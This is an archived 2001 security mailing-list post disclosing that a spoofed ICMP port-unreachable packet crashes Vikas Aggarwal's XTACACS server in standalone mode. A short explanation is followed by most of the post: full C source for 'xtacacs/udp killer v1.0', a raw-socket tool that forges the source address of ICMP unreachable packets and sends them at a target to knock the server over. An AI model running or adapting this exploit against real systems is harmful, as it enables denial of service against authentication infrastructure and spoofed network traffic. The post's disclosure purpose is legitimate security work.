Hi, I dunno if what follows has already been posted or not... Sorry if it has been. I recently discovered that when an ISP was using XTACACS server from Vikas Aggarwal (vikasat_private) in a standalone mode, it was possible to make the XTACACS server crash by sending it different type of ICMP messages. In order to exploit this, you only have to an ICMP unreachable message specifying port unreachable. Coaxial Karma c_karmaat_private --- cut here --- /************************************************************************ * * xtacacs/udp killer v1.0 by Coaxial Karma, c_karmaat_private * Modified version of nEWk.c by HyperioN * * Only few code has been modified: the loop for sending fake ICMP packets * has been removed and arguments provided also changed. * ************************************************************************/ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> int size; #define RESOLVE_QUIET #define IPHDRSIZE sizeof(struct iphdr) #define ICMPHDRSIZE sizeof(struct icmphdr) unsigned char *dest_name; unsigned char *origdest_name; unsigned char *spoof_name = NULL; struct sockaddr_in destaddr; unsigned long origdest_addr; unsigned long dest_addr; unsigned long spoof_addr; unsigned char type; unsigned long seq; int x=1; int cize; char *unreachables[] = {"Network unreachable", "Host unreachable", "Protocol unreachable", "Port unreachable", "Fragmantation needed and DF set", "Source route failed", "Network unknown", "Host unknown", "Source host is isolated", "Network administratively unreachable", "Host administratively unreachable", "Network unreachable - type of service", "Host unreachable - type of service"}; void banner(void) { printf("\nxtacacs/udp killer v1.0 by Coaxial Karma\n"); printf("modified version of nEWk.c (HyperioN)\n"); } void usage(const char *progname) { printf("usage:\n"); printf("%s <source> <dest>\n\n",progname); printf("\t<source> : address of fake ICMP packet sender\n"); printf("\t<dest> : destination of the unreach message\n"); printf("\n"); } int resolve( const char *name, struct sockaddr_in *addr, int port ) { struct hostent *host; bzero(addr,sizeof(struct sockaddr_in)); if (( host = gethostbyname(name) ) == NULL ) { #ifndef RESOLVE_QUIET fprintf(stderr,"unable to resolve host \"%s\" -- ",name); perror(""); #endif return -1; } addr->sin_family = host->h_addrtype; memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length); addr->sin_port = htons(port); return 0; } int resolve_one(const char *name, unsigned long *addr, const char *desc) { struct sockaddr_in tempaddr; if (resolve(name, &tempaddr,0) == -1) { printf("error: can't resolve the %s.\n",desc); return -1; } *addr = tempaddr.sin_addr.s_addr; return 0; } int resolve_all(const char *origdest, const char *dest, const char *spoof) { if (resolve_one(origdest,&origdest_addr,"origdest address")) return -1; if (resolve_one(dest,&dest_addr,"dest address")) return -1; if (spoof!=NULL) if (resolve_one(spoof,&spoof_addr,"spoof address")) return -1; destaddr.sin_addr.s_addr = dest_addr; destaddr.sin_family = AF_INET; destaddr.sin_port = 0; } /* * From ping.c (from original nuke.c) */ unsigned short in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* * This from echok, but with some mods (snuke.c) for unreach. */ inline int icmp_unreach_send(int socket, struct sockaddr_in *address, unsigned char icmp_code, unsigned long spoof_addr, unsigned long s_addr, unsigned long t_addr, unsigned s_port, unsigned t_port, unsigned long seq) { unsigned char packet[4098]; struct iphdr *ip; struct icmphdr *icmp; struct iphdr *origip; unsigned char *data; int i; ip = (struct iphdr *)packet; icmp = (struct icmphdr *)(packet+IPHDRSIZE); origip = (struct iphdr *)(packet+IPHDRSIZE+ICMPHDRSIZE); data = (char *)(packet+IPHDRSIZE+IPHDRSIZE+ICMPHDRSIZE); memset(packet, 0, 4098); ip->saddr = spoof_addr; ip->daddr = t_addr; ip->version = 4; ip->ihl = 5; ip->ttl = 255-random()%15; ip->protocol = IPPROTO_ICMP; ip->tot_len = htons(IPHDRSIZE + size + ICMPHDRSIZE + IPHDRSIZE + 8); ip->check = in_cksum(packet,IPHDRSIZE); origip->saddr = t_addr; /* this is the 'original' header. */ origip->daddr = s_addr; origip->version = 4; origip->ihl = 5; origip->ttl = ip->ttl - random()%15; origip->protocol = IPPROTO_UDP; origip->tot_len = IPHDRSIZE + 30; origip->id = random()%69; origip->check = in_cksum(origip,IPHDRSIZE); *((unsigned int *)data) = htons(s_port); *((unsigned int *)(data+2)) = htons(t_port); *((unsigned long *)(data+4)) = htonl(seq); /* 'original IP header + 64 bits (of bogus TCP header)' made. */ icmp->type = 3; icmp->code = icmp_code; icmp->checksum = in_cksum(icmp,size+ICMPHDRSIZE+IPHDRSIZE+8); /* the entire ICMP packet it now ready. */ #ifdef ICMP_PKT_DEBUG printf("Packet ready. Dump: \n"); for (i=0;i<IPHDRSIZE+ICMPHDRSIZE+IPHDRSIZE+8;i++) printf("%02X%c",*(packet+i),((i+1)%16) ? ' ' : '\n'); printf("\n"); #endif return sendto(socket,packet,IPHDRSIZE+size+ICMPHDRSIZE+IPHDRSIZE+8,0, (struct sockaddr *)address,sizeof(struct sockaddr)); /* ICMP packet is now over the net. */ } void main(int argc, char * *argv) { int s; banner(); if (argc != 3) { usage(argv[0]); return; } type = 3; seq=31331; spoof_name = argv[1]; dest_name = argv[2]; origdest_name = argv[1]; resolve_all(origdest_name, dest_name, spoof_name); s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); #ifdef IP_HDRINCL printf("We have IP_HDRINCL :-)\n\n"); if (setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else printf("We don't have IP_HDRINCL :-(\n\n"); #endif if(icmp_unreach_send(s,&destaddr,type,spoof_addr,origdest_addr,dest_addr,49,49,seq++)== -1) { printf("%s: error sending packet\n",argv[0]); perror(""); return; } } --- cut here --- ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:23 PDT